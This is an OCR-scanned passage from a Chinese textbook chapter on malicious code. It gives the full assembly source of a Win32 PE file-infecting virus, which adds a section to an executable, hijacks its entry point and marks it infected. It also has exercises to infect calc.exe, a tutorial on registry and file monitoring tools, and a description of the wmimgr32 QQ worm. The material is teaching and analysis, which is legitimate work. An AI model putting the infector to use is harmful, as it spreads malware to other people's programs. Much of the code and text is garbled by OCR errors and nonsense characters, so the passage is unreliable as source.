由 于 EXE 文件 被 执行 、 传 播 的 可 能 性 很 大 ， 因 此 Win32 PE 病毒 感染 文件 时 ， 基 本 


253 


上 都 会 将 EXE 文件 作为 目标 。 


一 般 来 说 ，Win32 病毒 是 这 样 被 运行 的 (有 些 是 在 HOST 运行 过 程 中 调用 病毒 代 


码 的 ): 


(1) 用 户 双击 或 者 系统 自动 运行 ) HOST 程序 。 
(2) 装载 HOST 程序 到 内 存 中 。 
(3) 通过 PE 文件 中 的 AddressOfEntryPoint 和 ImageBase 之 和 来 定位 第 一 条 语句 的 


位 置 。 


(4) 从 第 一 条 语句 开始 执行 (这 时 其 实 执行 的 是 病毒 代码 )。 

(5) 病毒 主体 代码 执行 完毕 ， 将 控制 权 交 给 HOST 程序 原来 的 入 口 代 码 。 

(6) HOST 程序 继续 执行 。 

计算 机 病毒 怎么 会 在 HOST 程序 之 前 执行 呢 ? 是 因为 病毒 对 这 种 PE 文件 格式 的 


HOST 程序 做 了 些 修改 。 可 见 ，Win32 PE 病毒 要 想 对 EXE 文件 进行 传染 ， 了 解 PE 文件 
格式 确实 是 不 可 少 的 。 
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【实验 环境 】 
Windows 操作 系统 ，test.exe。 


【实验 步骤 】 

编译 感染 例子 程序 bookexample-old.rar， 使 用 该 感染 例子 对 hello-2.5.exe 进行 感染 。 
为 了 方便 大 家 理解 ， 这 个 例子 分 解 为 4 个 文件 ， 每 个 部 分 有 一 个 主要 功能 。 

其 中 main.asm 为 主 文件 ， 其 内 容 如 下 : 


.model flat, stdcall 

Option casemap : none; case sensitive 
Include \masm32 \include \windows. inc 
Include \masm32 \include \comct132. inc 
Includelib \masm32 \lib \comct132. lib 


GetApiA proto : DWORD, :DWORD 


.CODE 

人 程序 入 口 -------------------------------- 
_Start0: 

Invoke InitCommonControls ;此 处 在 Win2000 下 必须 加 入 

Jmp _Start 

VirusLen =vEnd - VBegin ?Virus 长 度 

人 病毒 代码 开始 的 位 置 , 从 这 里 到 v_End 的 部 分 会 附加 在 HOST 程序 中 --------- 
vBegin: ;真正 的 病毒 部 分 从 这 里 开始 

Include s_ api.asm ? 查 和 

Es 以 下 为 数据 定义 

desfile db "test.exe"” .0 

fs1xe dd? 

hFile dd? 


eee 第 12 章 恶意 代码 处 理 mm 
hMap dd? 
pMem dd? 
pe_Header dd? 
Sec align dd? 
File align dd? 
newEip dd? 
oldEip dd? 
Inc_ size dd? 
oldEnd dd? 
7)--------------- 定义 MessageBoxR 函数 名 称 及 函数 地 址 存放 位 置 --------------- 
sMessageBoxA db "MessageBoxA" ,0 
aMessageBoxA dd 0 
;作者 定义 的 提示 信息 .… 
海 芝 自生 慌 db "By Hume, 2002", 0 
szMsg0 db "Hey, Hope U enjoy it!", 0 
CopyRight db "The SoftWare WAS OFFERRED by Hume [AfO0]", 0dh, 0ah 
db "Thx for using it!", Odh, 0ah 
db "Contact: Humewen@2lcn.com", 0dh, 0ah 
db "humeasm.yeah.net", 0dh, 0ah 
db "The add Code SiZe: (hex)" 
val dd 0,0,0,0 
ee 病毒 真正 入 口 位 置 --------------------------- 
Start: 
Call delta 
delta: 
pop ebp ;得 到 delta 地 址 
sub ebp, offset delta ;以 便于 后 面 变量 重 定位 
mov dword ptr [ ebp + appBase ], ebp 
mov eax, [ esp ] ;返回 地 址 
xor edx, edx 
getK32Base: 
dec eax ; 逐 字 节 比 较 验 证 , 速度 比较 慢 , 不 过 功能 一 样 
mov dx, word ptr [ eax + IMAGE DOS HEADER. e lfanew ] 


test dx, 0f000h 
jnz getK32Base 


;就 是 ecx + 3ch 
;Dos Header + stub 不 可 能 太 大 , 超过 4096B 
;加 速 检验 ， 下 一 个 


cmp eax, dword ptr [ eax + edx + IMAGE NT HEADERS. OptionalHeader. 


Image-Base ] 


jnz getK32Base 


?看 Image-Base 值 是 否 等 于 ecx 即 模块 起 始 值 


mov [ ebp + K32Base] ，eax; 如 果 是 ,就 认为 找到 kerne132 的 模块 传 入 地 址 


lea edi, 


[ ebp + aGetModuleHandle ] 


?edi 指向 API 函数 地 址 存放 位 置 


lea esi, [ ebp + lpApiAddrs ] 


lop_get: 
lodsd 


;esi 指向 API 函数 名 字 串 偏 移 地 址 (此 地 址 需要 定位 ) 
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cmp eax, 0 
上 4 End Get 
add eax, ebp 
push eax ;此 时 eax 中 放 着 GetModuleHandleA 函数 名 字 串 的 偏 移 位 置 
push dword ptr [ ebp + K32Base ] 
call GetApiA 
stosd 
jmp lop get ;获得 API 地 址 ,参加 s_api 文件 
End_ Get: 
Call my_infect ;获得 各 API 函数 地 址 后 , 开始 调用 感染 模块 
Include dislen.asm ;该 文件 中 代码 用 来 显示 病毒 文件 的 长 度 
CouldNotInfect: 
_where: 
xor eax, eax ;判断 是 否 已 经 附加 感染 标志 "dark" 
push eax 
call [ ebp + aGetModuleHeadle ] ;获得 本 启动 ( 获 HOST) 程序 的 加 载 模块 
mov esi, eax 
add esi, [ esi + 3ch ] ; ->esi-> 程 序 本 身 的 Pe_header 
cmp dword ptr [esi +8 ], 'dark' 
;判断 已 经 正在 运行 的 是 HOST 程序 ,还 是 启动 程序 
je jmp_oep ;是 HOST 程序 ,控制 权 交 给 HOST 
jmp Rit ;调用 启动 程序 的 退出 部 分 语句 
jmp_oep: 
add eax, [ ebp + oldEip ] 
jmp eax ; 跳 到 宿主 程序 的 入 口 点 


my_infect: 

xor 

push 
push 
push 
push 
push 
push 
lea 

push 
call 
inc 


je 


;感染 部 分 ,文件 读 写 操作 , PE 文件 修改 参见 modipe .asm 文件 
eax, eax 
eax 
eax 
OPEN_EXISTING 
eax 
eax 
GENERIC READ + GENERIC WRITE 
eax, [ ebp + desfile ] ;目标 文件 名 字 串 偏 移 地 址 
eax 
[ ebp + aGreateFile ] ;打开 目标 文件 
eax ;如 返回 -1, 则 表示 失败 


[ ebp + hFile ], eax ;返回 文件 句柄 
eax 

ebx, ebx 

ebx 

eax ;得 到 文件 大 小 


_sclosefile 


dec eax 

mov [ ebp + fsize ], eax 

xchg eax, ecx 

add ecx, 1000h ;文件 大 小 增加 4096B 

pop eax 

xor ebx, ebx ;创建 映射 文件 

push ebx ;创建 没有 名 字 的 文件 映射 

push ecx ;文件 大 小 等 于 原 大 小 + Vsize 

push ebx 

push PAGE READWRITE 

push ebx 

push eax 

call [ ebp + aCreateFileMapping] 

test eax, eax ;如 返回 0, 则 说 明 出 错 

je _sclosefile ;创建 成 功 否 ?不 成 功 , 则 跳 转 

mov [ ebp + hMap ], eax ;保存 映射 对 象 句 柄 

xor ebx, ebx 

push ebx 

push ebx 

push ebx 

push FILE MAP_ WRITE 

push eax 

call [ ebp + aMapViewOfFile ] 

test eax, eax ;映射 文件 ,是 否 成 功 ? 

je _sclosemap ;返回 0, 说 明 函 数 调 用 失败 

mov [ ebp + pMem ], eax ;保存 内 存 映射 文件 首 地 址 
;下 面 是 给 HOST 添加 新 节 的 代码 

include modipe. asm ;该 文件 中 主要 为 感染 目标 文件 的 代码 
_sunview: 

push [ ebp + pMem ] 

call [ ebp + aUnmapViewOfFile] 

;解除 映射 ,同时 修改 过 的 映射 文件 全 部 写 回 目标 文件 

_sclosemap: 

push [ ebp + hMap ] 

call [ ebp + aCloseHandle] ;关闭 映射 
_sclosefile: 

push [ ebp + hFile ] 

call [ ebp + aCallHandle ] ;关闭 打开 的 目标 文件 
Err: 

ret 
_xit: 

push 0 

call [ ebp + aExitProcess ] ;退出 启动 程序 
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VEnd: ;考虑 一 下 : 病毒 末尾 位 置 是 否 可 以 提前 ? 
s_api.asm 主要 是 查找 API 的 相关 函数 模块 ， 其 模块 如 下 : 


;手动 查找 API 部 分 
;K32_api_retrieve 过 程 的 Base 是 DLL 的 基础 , sApi 为 相应 的 API 函数 的 函数 名 地 址 
;该 过 程 返回 eax 为 该 RPI 函数 的 序号 

K32_api_retrieve proc Base: DWORD, sApi: DWORD 


二 二 二 二 局 二 有 证 adil====—==== 


push edx ;保存 edx 
xor eax, eax ;此 时 esi = sApi 
Next_ Api: ?edi = AddressOfNames 
xor edx, edx 
dec edx 


Match Api_ name: 
ImOVZX ebx, byte ptr [ esi ] 


inc esi 
cmp ebx, 0 
je foundit 
inc edx 
Push eax 
mov eax, [ edi + eax * 4 ] ;addressOfNames 的 指针 , 递增 
add eax, Base ;注意 是 RVA, 一 定 要 加 Base 值 
cmp bl，byteptr [ eax + edx ] ; 逐 字 符 比较 
pop eax 
多 Match_RAPi_name ;继续 搜寻 
inc eax ;不 匹配 ,下 一 个 API 
loop Nest_Api 
no_exist: 
pop edx ; 若 全 部 搜索 完 , 即 未 存在 
xor eax, eax 
ret 
foundit: 
pop edx 


;edx = AddressOfNameOrdinals * 2 得 到 AddressOfNameOrdinals 的 指针 
movzx eax, word ptr [ edx + eax * 2 ] 
;eax 返回 指向 AddressofFunctions 的 指针 
ret 
K32 api retrieve endp 


;Base 是 DLL 的 基 址 , sApi 为 相应 的 API 函数 的 函数 名 地 址 , 返回 eax 指向 API 函数 地 址 


GetApiA proc Base: DWORD, sApi: DWORD 
local ADDRodFun: DWORD 
pushad 
ImoV esi, Base 
mov eax, esi 


mov ebx, eax 
mov ecx, eax 
mov edx, eax 
mov edi, eax ? 几 个 寄存 器 全 部 置 为 DLL 基 址 
add ecx, [ ecx + 3ch ] ;现在 esi = off PE HEADER 
add esi, [ ecx + 78h ] 
;得 到 esi = IMAGE EXPORT_DIRECTORY 引出 表 入 口 
add eax, [ esi + lch ] ;eax = AddressOfFunctions 的 地 址 
mov RADDRofFun， eax 
mov ecx, [ esi + 18h ] ?ecx = NumberOfNames 
add edx, [ esi + 24h ] 
?edx = AumberOfNameOrdinals, 指 向 函数 对 应 序号 数组 
add edi, [ esi + 20h ] ?esi = AddressOfNames 


invoke  K32 api retrieve, Base, sApi 


;调用 另外 一 个 过 程 , 得 到 一 个 API 函数 序号 


mov ebx, ADDRofFunNn 
mov eax，[ ebx + eax * 4 ] ;要 *4 才能 得 到 偏 移 
add eax, Base ;加 上 Base 
mov [ esp+7 * 4], eax ;eax 返回 API 地 址 
popad 
ret 
GetApiA endp 
u32 db "User32.dll", 0 
k32 db "Kernal32.dll", 0 
appBase ddq? 
k32Base dd? 
je 以 下 是 有 关 API 函数 地 址 和 名 称 的 相关 数据 定义 -------------- 
lpApiAddrs label near ;定义 一 组 指向 函数 名 字 字 符 偏 移 地 址 的 数组 
dd offset sGetModuleHandle 
dd offset sGetProcAddress 
dd offset sLoadLibrary 
dd offset sCreateFile 
dd offset sCreateFileMapping 
dd offset sMapViewOfFile 
dd offset sUnmapViewOfFile 
dd offset sCloseHandle 
dd offset sGetFileSize 
dd offset sSetEndofFile 
qd offset sSetFilePointer 
dd offset sExitProcess 
dd 0, 0 ;以 便 判断 函数 是 否 处 理 完 


; 下面 是 第 一 函数 名 字符 串 , 以 便 和 引出 函数 表 中 的 相关 字段 进行 比较 
sGetModuleHandle db "GetModuleHandleA", 0 


sGetProcAddress db " GetProcAddress", 0 
sLoadLibrary db " LoadLibraryA", 0 
SCreateFile db "CreateFileA", 0 
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Ee 
sCreateFileMapping db "CreateFileMappingA", 0 
sMapViewOfFile db "MapViewOfFile", 0 
sUnmapViewOfFile db "UnmapViewOfFile", 0 
sCloseHandle db "CloseHandle",0 
sGetFileSize db "GetFileSize", 0 
sSetEndOfFile db "SetEndOofFile", 0 
sSetFilePointer db "SetFilePointer", 0 
SExitProcess db "ExitProcess", 0 
aGetModuleHandle dd 0 ;找到 相应 API 函数 地 址 后 的 存放 位 置 
aGetProcAddress dd 0 
aLoadLibrary dd 0 
aCreateFile dd 0 
aCreateFileMapping dd 0 
aMapViewOfFile dd 0 
aUnmapViewOfFile dd 0 
aCloseHandle dd 0 
aGetFileSize dd 0 
aSetEndOfFile dd 0 
aSetFilePointer dd 0 
aExitProcess dd 0 


Modipe.asm 用 来 在 HOST 程序 中 添加 一 个 病毒 节 ， 其 代码 如 下 : 


;修改 PE, 添加 节 , 实现 传染 功能 


Modipe.as: 


xchg eax, esi ;eax 为 在 内 存 映 射 文件 中 的 起 始 地 址 , 它 指向 文件 的 开始 位 置 
cmp word ptr [ esi ], 'ZM' 

jne CouldNotInfect 

add esi, [ esi + 3ch ] ;指向 PE_HEADER 

cmp word ptr [ esi ], 'EP' 

jne CouldNotInfect ;是 否 是 PE, 否则 不 感染 

cmp word ptr [ esi + 8 ], 'dark' 

jne CouldNotInfect 

mov [ ebp + pe_header ]，esi ”; 保 存 pe_Header 指针 

mov ecx, [ esi + 74h ] ;得 到 directory 的 数目 

imul ecx, ecx, 8 

lea eax, [ ecx + esi + 78h ] ?data directory eax -> 节 表 起 始 地 址 
movzx “ecx, word ptr [ esi + 6h ] ; 节 数 日 

imul ecx, ecx, 28h ;得 到 所 有 节 表 的 大 小 

add eax, ecx ; 节 结 尾 

xchg eax, esi ?eax -> Pe_header,esi-> 最 后 节 开始 偏 移 
中 太 兴 大 内 内 大 突 大 内 交大 内 大 突 交 大 突 奖 交 次 妆 突 交 奖 奖 央 妆 交 央 大 内 交 交大 太 类 大 类 大 类 闫 大 类 大奖 

;添加 如 下 节 

; name.hum 
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; VirtualSize = 原 size + VirSize 
; VirtualAddress = 

; SizeOfRawData 对 齐 

; PointerToRawData 


; PointerToRelocation dd 0 
; PointerToLinenumbers dd? 
; NumberOfRelocations dw ? 
; NumberOfLinenumbers dw ? 
; Characteristics dd? 
申 光头 风灾 淆 闪光 类 炎 交 次 六 类 闪 交 类 交 闪闪 六 类 闪闪 次 类 奖 次 奖 交 类 奖 闪闪 奖 关 奖 交 交大 关 奖 交 六 详实 交 
mov dword ptr [ esi ], 'muh.' ; 节 名 .hum 
mov dword ptr [ esi + 8 ], VirusLen ; 节 的 实际 大 小 
;计算 virtualsize 和 V.addr 
mov ebx, [ eax + 38h ] ; 节 对 齐 , 在 内 存 中 节 的 对 齐 粒 度 
mov [ ebp + sec align ], ebx 
mov edi, [ eax + 3ch ] ;文件 对 齐 , 在 文件 中 节 的 对 齐 粒 
mov [ ebp + file align ], edi 
mov ecx, [ esi - 40 + Och ] ;上 一 节 的 V.addr 
mov eax. [ esi -40 +8] ?上 一 节 的 实际 大 小 
xor edx, edx 
div ebx ; 除 以 节 对 齐 
test edx, edx 
je @@e1 
inc eax 
Q@eel: 
mul ebx ;上 一 节 在 内 存 中 对 齐 后 的 节 大 小 
add eax, ecx ;加 上 上 一 节 的 V.addqr 就 是 新 节 的 V.addr 
mov [ esi + 0ch ]，eax ;保存 新 section 偏 移 RVA 
add eax, _Start - vBegin ;病毒 第 一 行 执行 代码 , 并 不 是 在 病毒 节 的 起 始 处 
mov [ ebp + newEip ]，eax ;计算 新 的 EIP 
mov dword ptr [ esi + 24h ],0E0000020h ; 节 属性 
mov eax, VirusLen ;计算 sizeOfRawData 的 大 小 
cdp 
div edi ;计算 本 节 的 文件 对 齐 
3 @@@2 
Je eax 
@@@2: 
mul edi 
mov dword ptr [ esi + 10h ],eax ;保存 节 对 齐 文件 后 的 大 小 
mov eax, [ esi - 40 + 14h ] 
add eax, [ esi - 40 + 10h ] 
mov [ esi + 14h ], eax ;PointerToRawData 更 新 
mov [ ebp + oldEnd ] ,eax ;病毒 代码 往 HOST 文件 中 写 入 点 
mov eax, [ebp + pe_Header ] 
inc word ptr [ eax + 6h ] ;更 新 节 数 目 
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mov ebx，[ eax + 28h ] ;eip 指针 偏 移 
mov [ ebp + oldEip ], ebx ;保存 老 指针 
mov ebx, [ ebp + newEip ] 
mov [ eax + 28h ], ebx ;更 新 指针 值 
; comment $ 
mov ebx, [ eax + 50h ] ;更 新 ImageSize 
add ebx, VirusLen 
mov ecx, [ ebp + sec align ] 
xor edx, edx 
xchg eax, ebx ;eax 和 ebx 交换 
cdp 
div ecx 
test edx, edx 
je @@@3 
inc eax 
@@@3: 
mul ecx 
xchg eax, ebx ;还 原 eax->pe_Header 
mov [ eax + 50h ], ebx 
;确保 更 新 后 的 Image_Size 大 小 = ( 原 Image_Size + 病毒 长 度 ) 对 齐 后 的 长 度 
2$ 
mov dword ptr [ eax + 8 ], 'dark' 
;病毒 感染 标志 直接 写 到 被 感染 文件 的 PE 头 中 
cld 
mov ecx, VirusLen 
mov edi, [ ebp + oldEnd ] 
add edi, [ ebp + pMem ] 
lea esi, [ ebp + vBegin ] 
rep movsb ;将 病毒 代码 写 入 目标 文件 新 建 的 节 中 
xor eax, eax 
sub edi, [ ebp + pMem ] 
push FILE BEGIN 
push eax 
push edi 
push [ ebp + hFile ] 
call [ ebp + aSetFilePointer ] ; 设 定 文件 读 写 指针 
push [ ebp + hFile ] 
call [ ebp + aSetEndofFile ] ;将 当前 文件 位 置 设 为 文件 末尾 


dis_len.asm 用 来 显示 前 面 定 义 的 提示 信息 ， 其 中 包括 病毒 体 的 大 小 ， 其 代码 如 下 : 


push eax 
call dword ptr [ ebp + aLoadLibrary ] ;导入 user32.d11 链接 库 
test eax, eax 
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jnz @gl 
@gl: 
lea edx. [ ebp + sMessageBoxA ] 
push edx 
push eax 
mov eax, dword ptr [ ebp + aGetProcAddress] 
;获取 MessageBoxA 函数 的 地 址 
call eax 
mov [ ebp + aMessageBoxA ], eax 
mov ebx, VirusLen 
mov ecx, 8 
cld 
lea edi, [ ebp + val ] 
bls 
rol ebx, 4 
call binToAscii 
loop L1 
push 40h + 1000h 
lea eax, [ ebp + sztit ] 
push eax 
lea eax, [ ebp + CopyRight ] 
push 0 
call [ ebp + aMessageBoxA ] 
jmp _where 
binToAscii proc near ;此 函数 用 来 将 二 进 制 转换 为 字符 
mov eax, ebx 
and eax, 0fh 
add al, 30h 
cmp al, 39h 
jbe @f 
add al, 7 
@@: 
stosb 
et 


binToAscii endp 


病毒 修改 了 程序 入 口 地 址 点 使 其 指向 病毒 入 口 位 置 ， 同 时 保存 旧 的 程序 入 口 地 址 ， 
以 便 返 回 HOST 程序 继续 执行 。 

病毒 感染 文件 做 了 以 下 操作 。 

(1) 写 入 一 个 新 的 节 表 。 

(2) 修改 映像 文件 头 中 的 节 表 数目 。 
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(3) 修改 了 程序 入 口 地 址 点 使 其 指向 病毒 入 口 位 置 ， 同 时 保存 旧 的 程序 入 口 地 址 ， 
以 便 返 回 HOST 程序 继续 执行 。 

(4) 更 新 了 SizeOfImage。 

(5) 写 入 了 感染 标记 。 

(6) 添加 了 病毒 节 。 


【思考 题 】 

(1) 编写 病毒 感染 程序 bookexample-new.rar 的 病毒 清除 程序 ， 使 其 可 以 用 来 恢复 被 
感染 的 任何 文件 。 

(2) 编译 感染 例子 程序 bookexample-new.rar， 使 用 该 感染 例子 对 计算 器 calc.exe 进 
行 感染 。 手 工 恢复 被 感染 的 calc.exe。 

(3) 利用 PE 查看 工具 分 析 感 染 文件 test.exe 并 回答 以 下 问题 。 

@ 感染 之 后 NumberOfSection 的 大 小 变 为 

@ 添加 新 的 节 的 节 名 为 

@ RVA 入 口 地 址 变 为 

@ 装 入 内 存 后 映像 大 小 SizeOfImage 


和 ;3 ” 亚 意 代 码 行为 分 析 


12.3.1 注册 表 及 文件 监视 工具 的 使 用 


【实验 目的 】 

熟悉 注册 表 和 文件 监视 工具 的 使 用 。 

【原理 简介 】 

1. RegMon 和 FileMon 的 基本 原理 

FileMon 是 一 款 出 色 的 文件 系统 监视 软件 ， 它 可 以 监视 应 用 程序 进行 的 文件 读 写 操 
作 。 它 将 所 有 与 文件 相关 的 操作 (如 读 取 、 修 改 、 出 错 信 息 等 ) 全 部 记录 下 来 以 供用 户 
参考 ， 并 允许 用 户 对 记录 的 信息 进行 保存 、 过 滤 、 查 找 等 处 理 ， 这 就 为 用 户 对 系统 的 维 
护 提供 了 极 大 的 便利 。 同 时 会 监视 对 程序 的 所 有 操作 ， 比 如 在 程序 中 进行 单 击 操作 也 会 
被 监视 。FileMon 最 大 的 优点 是 可 以 对 病毒 、 间 谍 、 木 马 程序 进行 全 面 的 监视 ， 一 旦 这 
些 程序 运行 就 会 立即 被 发 现 ， 也 可 以 说 它 是 防 病毒 软件 的 辅助 工具 。 

RegMon 是 一 款 出 色 的 注册 表 监 视 软件 ， 是 FileMon 的 老大 哥 。 它 就 像 一 
深入 系统 深 处 ， 监 视 任何 针对 注册 表 的 动作 。 它 将 与 注册 表 数 据 相关 的 一 切 操作 (如 读 
取 、 修 改 、 出 错 信 息 等 ) 全 部 记录 下 来 供用 户 参考 ， 并 允许 用 户 对 记录 的 信息 进行 保存 、 
过 滤 、 查 找 等 处 理 ， 这 就 为 用 户 对 系统 的 维护 提供 了 极 大 的 便利 。 

2. RegSnap 和 File2000 的 基本 原理 

RegSnap 的 原理 非常 简单 :在 需要 的 时 候 ， 通 过 【文件 】| 【新 建 】 菜 单 或 工具 条 按 
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钮 将 当前 注册 表 及 相关 内 容 保 存 到 扩展 名 为 rsnp 的 文件 中 (如 在 安装 新 软件 之 前 和 软件 
安装 结束 后 分 别 保存 一 次 )， 然 后 通过 【文件 】| 【比较 】 菜单 比 较 这 两 个 文件 ，RegSnap 
就 会 详细 地 报告 注册 表 及 与 系统 有 关 的 其 他 内 容 的 变化 情况 。RegSnap 对 系统 的 比较 报 
告 非常 具体 。 对 注册 表 可 报告 修改 了 哪些 键 ， 修 改 前 、 后 的 值 各 是 多 少 ， 增 加 和 删除 了 
哪些 键 以 及 这 些 键 的 值 。 报 告 结果 既 可 以 以 纯 文 本 的 方式 ， 也 可 以 HTML 网 页 的 方式 显 
示 ， 非 常 便于 查看 。 RegSnap 还 可 以 报告 系统 的 其 他 情况 : Windows 的 系统 目录 (默认 
是 C\Windows) 和 系统 的 system 子 目录 下 文件 的 变化 情况 ,包括 删除 、 替 换 、 增 加 了 哪 
些 文件 ，Windows 的 系统 配置 文件 win.ini 和 system.ini 的 变化 情况 ， 包 括 删除 、 修 改 和 
增加 了 哪些 内 容 ; 自动 批 处 理 文 件 autoexec.bat 和 config.sys 是 否 被 修改 过 等 。 

File2000 是 基于 “全 文 检索 ”( 不 必 记 忆 文 件 名 和 路 径 》 和 “ 即 查 即 看 ”( 查询 时 可 
以 看 到 目标 文件 的 文本 内 容 ) 技术 基础 上 的 计算 机 文件 管理 软件 ， 它 能 够 实现 本 地 或 网 
络 计算 机 上 各 个 文件 夹 中 的 常用 文档 的 检索 与 预览 ， 并 能 根据 用 户 设置 自动 更 新 。 
File2000 的 成 功 开发 将 使 用 户 从 繁琐 的 文件 查找 工作 中 彻底 解脱 出 来 ， 使 工作 效率 大 大 

【实验 环境 】 

Windows 系统 ， 网 络 环境 ，Regmon.exe，Filemon.exe，RegSnap.exe，File2000.exe。 


【实验 步骤 】 

1. 熟悉 RegMon 和 FileMon 的 具体 用 途 

RegMon 主要 是 用 来 监视 进程 对 注册 表 的 访问 ， 而 FileMon 主要 是 用 来 监视 进程 对 
文件 的 访问 。 

利用 FileMon 监视 QQ2008 的 登录 过 程 如 下 。 

(1) 设置 FileMon 的 过 滤器 属性 ,【 包 含 】 属 性 设置 为 QQ.exe。 

(2) 监视 QQ 完整 的 登录 过 程 ， 保 存 所 监视 的 日 志文 件 。 

(3) 仅 监视 QQ 密码 输入 错误 的 登录 过 程 ， 保 存 所 监视 的 日 志文 件 并 与 完整 的 文件 
做 比较 。 

(4) 修改 自己 的 QQ 密码 ， 用 UltraEdit 比较 相同 用 户 的 两 个 不 同 密码 的 密码 文件 。 

2. 使 用 RegSnap 和 File2000 创建 快照 

RegSnap 主要 是 用 来 创建 注册 表 的 快照 ， 而 File2000 主要 是 用 来 创建 文件 的 快照 。 

使 用 RegSnap 快照 比较 功能 ， 并 分 析 快 照 比 较 报 告 。 

(1) 首先 使 用 RegSnap 创建 一 快照 ， 参 数 为 默认 〈 该 步骤 中 参数 均 为 默认 )。 在 注 
释 信息 框 中 输入 注释 信息 ， 比 如 创建 的 快照 名 ， 如 图 12-6 所 示 。 

单 击 【 确 定 】 以 后 ，RegSnap 开始 创建 快照 ， 结 果 如 图 12-7 所 示 。 

(2) 在 本 机 上 安装 任意 一 个 应 用 程序 。 

(3) 再 次 使 用 RegSnap 创建 快照 ， 步 骤 同 〈1) 中 所 示 ， 并 使 用 快照 比较 功能 分 析 
比较 报告 ， 选 择 菜单 中 的 【文件 】|【 比 较 〗 或 者 直接 单 击 菜单 栏 上 的 “天 平 ” 或 使 用 
快捷 键 F5， 弹 出 如 图 12-8 所 示 的 【比较 快照 】 界 面 。 
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[EE 生成 所 有 项 目的 快照 


目录 下 的 文件 列表 及 Windows 文件 目 


加 
口 远 租 FC 的 注册 表 ( 羽 专 业 版 可 用 9 ) 选择 快照 的 创建 模式 。 目 前 有 三 种 模式 可 用 : 
RegSnap 将 保存 系统 注册 表 、Windows 


录 、Wy Documents 目录 及 Progran 
Files 目录 、 win ini 及 system ini 
文件 、autoexec. bat 及 config sys 文 


信息 。 
妈 生 成 注册 表 的 快照 


长 保存 系统 注册 表 。 快 照 文件 的 容量 较 
小 ,处理 过 度 较 快 。 


运程 PC 的 注册 表 


连接 多 有 远程 计算 机 注册 表 并 创建 块 照 。 
目标 i+ 管 机 必须 良 二 Remote “entvol 


图 12-6 填写 保存 快照 名 


regsnap 


文件 列表 快照 位 于 - 5: WINDOYS\*.*+; 293 个 文件 


文件 列表 快照 位 于 - 5: MWINDOWS\system32\#.#; 


2504 个 文件 


文件 列表 快照 位 于 : C;\Docunents and Settings\Adninistrator\My Docunents\#.#*; 26 个 文件 


文件 列表 快照 位 于 ; C;\Program Files\*.*#; 49 


个 文件 


CC 下 
图 12-7 创建 注册 表 完 


[J 
TCT ID TE Ninini st ator-072011201309 C8) [] 
注意 ，RezSnap 将 按照 生成 快 有 的 时 间 先 后 来 决定 全 了 的 上 序 。 
_ 报 省 选项 
避 显 示 已 被 休 改 的 主妇 名 称 
显 亲生 他 改 的 主 扫 吉 称 有 键 人 
加 生成 KEG 文件 咏 销 及 重 做 更 改 ] 
回 吉 过 长 的 转 信 项 


回 映射 主键 名 称 到 当前 用 户 


Da 由 :输出 的 文件 格 被 保存 到 


Irs-172CBT! 19DPA64TF-Adninistrator-072911201347-rs-172CB7190| 
口 使用 外 部 程序 查看 Ca ] 


图 12-8 ”比较 快照 
单 击 【确定 】 按 钮 ， 得 到 如 图 12-9 所 示 的 比较 结果 界面 。 


在 比较 报告 中 ,统计 了 在 第 〈2) 步 中 运行 


选择 两 个 快照 。ReaSnap 

件 。 你 可 以 通过 "浏览 ， 这 知人 的 2 
文档 。 有 两 个 选项 可 供 选择 : 妇 星 元 己 此 餐 cX 的 二 
经 台 藉 或 旺 元 此 绢 以 的 去 双全 基色 信 (两 个 快照 
的 生 全 和 站 和 键 值 )。 

在 “高 级 选项 ” ee 你 可 以 选择 要 从 报告 中 排 
除 的 注册 表 主 键 (所 有 媒 套 的 子 键 也 将 被 排除 )。 举 
例 说 来 ， 有 的 时 候 RegSnap 自己 也 会 更 改 注册 表 。 
ee 只 需 在 排除 列表 指定 要 排除 


的 四 本 指定 册 出 的 女人 名 称 人 文本 或 超 文本 )。 警 
当 ! 如 果 输 出 的 目的 文件 已 存在 ， 文 件 格 被 覆盖 而 没 
有 警 省 提示 。 报 党 将 在 RegSnap 窗口 中 打开 。 
RegSnap 也 可 以 生成 报 肖 相 关 的 REG 文件 (生成 REG 
文件 “选项 )，RegSnsp 将 创建 两 个 .REG 文件 : 
Repor tHane)Undo. RBEG 及 <ReportlaneRedo. REG» 
是 重 做 对 注册 表 进 行 的 更 
到 肯 ! 人 EEG 文件 是 很 危险 的 
任务 处 理 系统 ， 其 地 程序 可 


进行 更 改 前 ， 你 必须 重新 查看 RE 文件 的 内 容 1 


截 短 过 长 的 转 久 项 
选中 此 项 ， 则 Regsnap 将 自动 截 短 过 长 的 转 储 项 。 回 


了 应 用 程序 后 ， 该 应 用 程序 对 沪 


的 修改 。 对 其 进行 分 析 ， 并 做 相应 的 反 向 操作 工作 便 可 恢复 到 程序 运行 之 前 ， 


手动 解除 病毒 。 
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E 册 表 所 做 


这 多 用 于 


在 此 报告 中 : 
让 


注册 表 快 昭 
文件 列表 位 于 C:\WINDOWS\*.* 


立 件 列表 位 于 C:\WINDOWS\system32\*.* 
件 列表 位 于 C: ments an In: 


文件 列表 位 于 C:\program Files\*.* 


表 快 时 


图 12-9 注册 表 比 较 报 告 


12.3.2 ”恶意 代码 行为 分 析 及 相应 解除 方法 


【实验 目的 】 
针对 特定 的 恶意 代码 程序 ， 能 够 分 析 其 大 致 行为 ， 并 找到 相应 的 解除 方法 。 
【原理 简介 】 


wmimgr32 病毒 ， 又 称 QQ 爱 虫 (I-Worm/QQ.Pom) 病毒 ， 是 通过 在 线 QQ 发 送 病毒 
文件 的 网 络 蠕虫 病毒 。 病 毒 运行 后 会 在 系统 目录 下 创建 病毒 程序 文件 ， 修 改 注册 表 ， 实 
现 病毒 开机 自 启 ， 并 使 用 户 无 法 手工 修改 注册 表 和 使 用 任务 管理 器 。 此 外 ， 该 病毒 运行 
后 会 从 黑客 网 站 下 载 另 一 病毒 (BackdoorJieba.2004), 后 者 可 以 捕获 Windows 9x/2000/XP 
下 的 几乎 所 有 普通 窗口 的 登录 密码 ， 如 OICQ/QQ、ICQ、Outlook、Foxmail、 电 子 邮 箱 、 
网 吧 上 网 账号 、 软 件 注 册 码 、 各 种 游戏 软件 、 各 种 财务 软件 、 各 种 管理 软件 、 拨 号 上 网 、 
共享 目录 、 屏 保 等 ， 以 及 各 种 在 网 页 中 的 登录 密码 ， 如 Web 邮件 、 江 湖 论坛 、 聊 天 室 、 
密码 保护 资料 等 。wmimgr32 病毒 的 感染 过 程 如 下 。 

(1) 病毒 运行 后 ， 将 创建 下 列 文件 : %SystemDir%\wbem\dhelp.dll，20 480B; 
%SystemDir%\dhelp.dll, 20 480B; %SystemDir%\wmimgr.exe, 20 480B 。 

